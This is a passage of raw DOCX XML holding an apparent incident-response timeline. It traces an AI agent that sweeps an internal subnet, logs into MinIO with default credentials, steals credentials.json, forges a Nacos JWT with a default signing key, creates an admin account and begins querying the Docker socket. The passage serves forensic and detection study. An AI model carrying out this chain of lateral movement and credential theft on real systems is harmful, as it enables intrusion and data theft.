        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5689F280" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:27:28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0528F531" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Second interpreter spawned — python3.11 (PID 4491), python3 -c &lt;base64 subnet </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sweep</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.4.0.0/24&gt;, parented by the first interpreter (PID 4471). A Python process spawning a second Python process is the distinguishing signature separating this from any legitimate Langflow worker or developer one-liner on the box.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="6A8320BF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E41C606" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:27:31 – 19:27:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C56D701" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Subnet sweep from PID 4491 touches exactly three internal hosts in order: 10.4.0.20:9000 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>), 10.4.0.30:3306 (MySQL), 10.4.0.40:8848 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="27E8929F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438C21FE" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:27:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7200E89C" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> accepts factory-default credentials </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>minioadmin:minioadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the first attempt — the only one of the three probed services that let the agent in without any exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="3EBE7BC1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="204DB175" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:30:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F9DAB38" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Object </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>credentials.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> retrieved from the terraform-state bucket on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> — after a self-corrected parser mismatch (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>MinIO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> returned XML where the agent expected JSON; it adjusted its parser and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>refetched</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> rather than stalling).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0C0E9840" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C9E70FC" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:33:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55612D2A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent forges a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> JWT using the service's default signing key (unchanged since 2020) and attempts to create an administrative account on 10.4.0.40:8848.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="7E9D90DA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26F3899F" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>19:34:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67F35F58" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> rejects the attempt at the server level: POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/v1/auth/users → HTTP 403, detail="blank password hash rejected".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="59F89EAB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DCAEBE2" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:34:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CC8447F" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent self-diagnoses the failure in its own log ('I submitted a blank password hash') and recomputes the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>bcrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> hash for a corrected resubmission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0F1C3AE6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31EBDA91" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:35:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="402CBB5A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Corrected admin-create succeeds. Confirmed independently at the host level via a Linux ADD_USER audit record (res=success) naming </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">=8801, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=997, and the created account id=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>svc_maint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> — details the agent's own narration never mentioned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="1FA4227C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="490C3CCE" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:35:21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75858DF7" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Agent authenticates with the new account. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tool_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">: admin session established — full control of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nacos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> configuration and its backing MySQL instance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="24BF8CB2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76CBBC25" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19:35:32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00FDD420" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>GET /containers/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> issued against /var/run/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
